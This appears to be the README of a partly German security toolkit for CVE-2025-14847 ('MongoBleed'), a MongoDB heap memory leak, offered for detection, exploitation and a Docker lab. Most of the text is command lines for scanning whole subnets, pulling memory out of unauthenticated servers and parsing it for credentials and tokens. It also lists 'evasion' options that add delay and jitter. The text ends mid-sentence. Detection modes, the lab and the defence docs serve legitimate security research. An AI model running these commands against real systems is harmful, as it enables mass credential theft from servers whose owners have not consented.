
CVE-2025-14847 (MongoBleed) Scanner- und Exploit-Tool. Nicht authentifiziertes MongoDB-Heap-Speicherleck durch zlib-Dekomprimierung. Erkennung, Speicherextraktion, Credential-Parsing, CIDR-/Batch-Scanning, Nuclei-Vorlagen und CTF-Labor inklusive.
CVE-2025-14847 Scanner- und Exploitation-Toolkit
Ein Sicherheitsforschungs-Toolkit für MongoBleed – ein kritisches, nicht authentifiziertes Speicherleck in der zlib-Dekomprimierung von MongoDB, das Angreifern ermöglicht, ohne Authentifizierung sensible Daten aus dem Heap-Speicher des Servers zu extrahieren.
╔╦╗┌─┐┌┐┌┌─┐┌─┐╔╗ ┬ ┌─┐┌─┐┌┬┐
║║║│ │││││ ┬│ │╠╩╗│ ├┤ ├┤ ││
╩ ╩└─┘┘└┘└─┘└─┘╚═╝┴─┘└─┘└─┘─┴┘
CVE-2025-14847 Scanner & Exploit
# No external dependencies -- Python 3 standard library only
cd cli
# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017
# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24
# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials
# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s
MongoBleed/
├── cli/ # Command-line scanner and exploitation tool
│ ├── mongobleed.py # Main CLI tool
│ ├── requirements.txt # Python dependencies (stdlib only)
│ └── README.md # CLI documentation
├── lab/ # Docker-based CTF lab environment
│ ├── docker-compose.yml # Multi-container lab setup
│ ├── vulnerable/ # Vulnerable MongoDB configurations
│ ├── patched/ # Patched MongoDB for comparison
│ ├── no-zlib/ # Non-exploitable (zlib disabled)
│ ├── monitoring/ # Attack visualization dashboard
│ ├── warmup-heap.sh # Populate heap with sensitive data
│ └── README.md # Lab setup instructions
├── nuclei/ # Nuclei scanning templates
│ ├── CVE-2025-14847.yaml # Active exploitation template
│ ├── CVE-2025-14847-safe.yaml # Safe detection template
│ └── README.md # Nuclei template docs
├── docs/ # Educational documentation
│ ├── README.md # Learning path index
│ ├── 01-fundamentals.md # MongoDB & memory basics
│ ├── 02-vulnerability.md # CVE-2025-14847 deep dive
│ ├── 03-exploitation.md # Hands-on exploitation
│ ├── 04-detection.md # Hunting and detection
│ └── 05-defense.md # Mitigation strategies
└── README.md # This file
192.168.1.0/24, 10.0.0.0/16:27018)# Check single target
python mongobleed.py -t localhost:27017
# Check with verbose output
python mongobleed.py -t localhost:27017 -v
# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s
# Show version info
python mongobleed.py -t localhost:27017 --version
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24
# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018
# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json
# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e
# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500
# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous
# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials
# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens
# Extract printable strings
python mongobleed.py -t target:27017 -e --strings
# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500
# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017
# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017
# Scan multiple targets
nuclei -t nuclei/ -l targets.txt
# Start all containers
cd lab && docker compose up -d
# Services:
# - localhost:27017 MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018 MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019 MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020 MongoDB 8.0.17 (Patched)
# - localhost:27021 MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080 Monitoring Dashboard
# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50
# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials
Target:
-t, --target TARGET Target host:port or CIDR range (e.g. 192.168.1.0/24)
-T, --targets FILE File with target list (supports CIDR per line)
Detection:
--detect Detect if target is vulnerable (default action)
--version Show MongoDB version
-s, --safe Safe mode - detection only, no exploitation
Exploitation:
-e, --extract Extract memory via offset scanning
--min-offset N Minimum offset to probe (default: 20)
--max-offset N Maximum offset to probe (default: 8192)
--continuous Continuous extraction mode
--force Force extraction even if version check fails
Analysis:
--credentials Parse for credentials
--tokens Parse for tokens
--strings Extract printable strings
--hexdump Display hexdump
Evasion:
--delay MS Delay between requests (milliseconds)
--jitter Random delay jitter
Output:
-o, --output FILE Output file (JSON)
-v, --verbose Verbose output
-q, --quiet Quiet mode
--json JSON output
--no-color Disable colors
Connection:
--timeout SECS Connection timeout (default: 10)
-j, --threads N Threads for batch scanning (default: 10)
Das Tool durchsucht extrahierten Speicher nach den folgenden Mustern: